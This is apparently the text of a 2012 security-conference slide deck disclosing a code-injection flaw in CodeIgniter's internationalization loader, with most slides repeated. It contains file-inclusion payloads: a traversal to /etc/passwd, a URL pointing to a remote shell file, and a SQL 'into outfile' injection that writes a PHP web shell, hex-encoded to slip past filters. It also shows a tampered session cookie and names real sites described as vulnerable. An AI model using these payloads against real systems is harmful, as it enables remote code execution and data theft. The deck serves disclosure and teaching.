CodeIgniter i18n Code Injection

Abbas Naderi (aka AbiusX)OWASP Chapter Leader of IranISSECO Memberabbas.naderi@owasp.org / me@abiusx.com

Abbas Naderi (aka AbiusX)OWASP Chapter Leader of IranISSECO Memberabbas.naderi@owasp.org / me@abiusx.com

20 May 201220 May 2012

Understand the Context

PHP

• Mostly used SSI (75%)• 17 Years Maturity• Open Source Nature• Rapid Develop/Deploy• Secure Core• Insecure Libraries• Low Level Web Development *

PHP Frameworks

• PHP low level web support• Incorporation of Frameworks• Much Used and Mature -> Secure• Huge Codebase -> Insecure• Developers, not Security guys• Security-Oriented Frameworks (OWASP

ESAPI)

CodeIgniter

• Most used Mid-level Framework

Internationalization

• i18n importance today• Difficult implementation:

– File-based (Wordpress, eFront, …)– Database (jFramework)– Code-based (CodeIgniter, …)

• Obsolete consumers -> No testing

Remote File Inclusion

RFI at a glanceRFI at a glance

• 3rd Most Common Vuln. in Top Ten 2007 : Malicious File Inclusion

• Not in Top Ten 2010 : Mostly Understood and Fixed

• Highest Impact (Run Arbitrary Code!)• Common on Interpreted Languages• Most Common in PHP (Why?)

• 3rd Most Common Vuln. in Top Ten 2007 : Malicious File Inclusion

• Not in Top Ten 2010 : Mostly Understood and Fixed

• Highest Impact (Run Arbitrary Code!)• Common on Interpreted Languages• Most Common in PHP (Why?)

RFI Example<?php

$page = $_GET[‘page’];

include “./pages/{$page}.php”;

Malicious Input:

Mysite.com?page=../../../etc/passwd%00

Where current dir is /var/www

include “/var/www/pages/../../../etc/passwd”;

= include “/etc/passwd”; //show it on screen

<?php

$page = $_GET[‘page’];

include “./pages/{$page}.php”;

Malicious Input:

Mysite.com?page=../../../etc/passwd%00

Where current dir is /var/www

include “/var/www/pages/../../../etc/passwd”;

= include “/etc/passwd”; //show it on screen

RFI Cheatsheet

Use null character on input to terminate string:include “./{$page}.you.cant.rfi.me.php”;

Use absolute paths if input initiates include:include “{$_GET[‘page’]}”;

page=http://abx.ir/shell.txt%00

allow_url_include

If "URL fopen wrappers" are enabled in PHP (which they are in the default configuration), you can specify the file to be included using a URL (via HTTP or other supported wrapper) instead of a local pathname.

e.g include “ftp://192.168.1.1/file.txt”;

If "URL fopen wrappers" are enabled in PHP (which they are in the default configuration), you can specify the file to be included using a URL (via HTTP or other supported wrapper) instead of a local pathname.

e.g include “ftp://192.168.1.1/file.txt”;

Filter Parameters

• CodeIgniter has the least found exploits on all major PHP frameworks (Commercial Codebase)

• CodeIgniter filters dangerous characters such as ‘ , “, /, ?, <, > on GET parameters, to prevent most XSS and Injection attacks.

• CodeIgniter has central module loader, and MVC pattern, preventing most RFIs.

Internationalization

• System/Core/ Lang.php:

function load($langfile = '', $idiom = '', $return = FALSE, $add_suffix = TRUE,

$alt_path = '')

{

$langfile = str_replace('.php', '', $langfile);

if ($add_suffix == TRUE)

{

$langfile = str_replace('_lang.', '', $langfile).'_lang';

}

$langfile .= '.php';

Internationalization (II)

if (file_exists($package_path.'language/'.$idiom.'/'.$langfile))

{

include($package_path.'language/'.$idiom.'/'.$langfile);

$found = TRUE;

break;

}

The $idiom is obtained from cookies as $_COOKIE[‘lang’]

$langfile is the domain keyword, e.g “sales”

Local File InclusionLocal File Inclusion

• Useful to extract info. from target system– /etc/passwd– ./config/database.php

• Easy to exploit

• Useful to extract info. from target system– /etc/passwd– ./config/database.php

• Easy to exploit

Local Code InclusionLocal Code Inclusion

• Requires a blind injection:– ‘ and 1=0 union select “<?php echo shell_exec($_REQUEST[q]); ” into

outfile “/tmp/sales_lang.php” --

– CodeIgniter filters <? From input– ‘ and 1=0 union select

unhex(“3c3f706870206563686f207368656c6c5f6578656328245f52455155

4553545b715d29″) into outfile “/tmp/common_lang.php” --

– Caution: into outfile does not overwrite!– Where to find blind injection?

• Requires a blind injection:– ‘ and 1=0 union select “<?php echo shell_exec($_REQUEST[q]); ” into

outfile “/tmp/sales_lang.php” --

– CodeIgniter filters <? From input– ‘ and 1=0 union select

unhex(“3c3f706870206563686f207368656c6c5f6578656328245f52455155

4553545b715d29″) into outfile “/tmp/common_lang.php” --

– Caution: into outfile does not overwrite!– Where to find blind injection?

Local Code Inclusion (II)Local Code Inclusion (II)

• Now change cookie from– a%3A8%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A

%22aa55f87c8b18afe75b3cd7baba330553%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22178.162.154.251%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10.7%3B+rv%3A12%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221337541932%22%3Bs%3A3%3A%22lan%22%3Bs%3A1%3A%221%22%3Bs%3A3%3A%22dir%22%3Bs%3A3%3A%22rtl%22%3Bs%3A4%3A%22lang%22%3Bs%3A2%3A%22fa%22%3Bs%3A3%3A%22alg%22%3Bs%3A5%3A%22right%22%3B%7Db3c9bed5e9656eca61938c9bc6965bad

– To lang%22%3Bs%3A2%3A%22../../../../../tmp

• Now change cookie from– a%3A8%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A

%22aa55f87c8b18afe75b3cd7baba330553%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22178.162.154.251%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10.7%3B+rv%3A12%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221337541932%22%3Bs%3A3%3A%22lan%22%3Bs%3A1%3A%221%22%3Bs%3A3%3A%22dir%22%3Bs%3A3%3A%22rtl%22%3Bs%3A4%3A%22lang%22%3Bs%3A2%3A%22fa%22%3Bs%3A3%3A%22alg%22%3Bs%3A5%3A%22right%22%3B%7Db3c9bed5e9656eca61938c9bc6965bad

– To lang%22%3Bs%3A2%3A%22../../../../../tmp

Remote Code InclusionRemote Code Inclusion

• Look at the code:include($package_path.'language/'.$idiom.'/'.$langfile);

• You a hacker? tell me how!

• Look at the code:include($package_path.'language/'.$idiom.'/'.$langfile);

• You a hacker? tell me how!

Remote Code Inclusion (II)Remote Code Inclusion (II)

$this->load->add_package_path()Adding a package path instructs the Loader class to prepend a given path for subsequent requests for resources. As an example, the "Foo Bar" application package above has a library named Foo_bar.php. In our controller, we'd do the following:

$this->load->add_package_path(APPPATH.'third_party/foo_bar/');

http://codeigniter.com/user_guide/libraries/loader.html

$this->load->add_package_path()Adding a package path instructs the Loader class to prepend a given path for subsequent requests for resources. As an example, the "Foo Bar" application package above has a library named Foo_bar.php. In our controller, we'd do the following:

$this->load->add_package_path(APPPATH.'third_party/foo_bar/');

http://codeigniter.com/user_guide/libraries/loader.html

DemonstrationDemonstration

CodeIgniter + i18n

• More than 240 sites discovered:– http://www.sedoparking.com– http://bambooinvoice.org/– http://www.haughin.com/– http://www.rapyd.com/– http://code-igniter.ru/

• And tons more…

• More than 240 sites discovered:– http://www.sedoparking.com– http://bambooinvoice.org/– http://www.haughin.com/– http://www.rapyd.com/– http://code-igniter.ru/

• And tons more…

Questions? Feedback?

Abbas Naderi (aka AbiusX)

OWASP Chapter Leader of Iran

ISSECO Member

abiusx@acm.org / me@abiusx.com

Abbas Naderi (aka AbiusX)

OWASP Chapter Leader of Iran

ISSECO Member

abiusx@acm.org / me@abiusx.com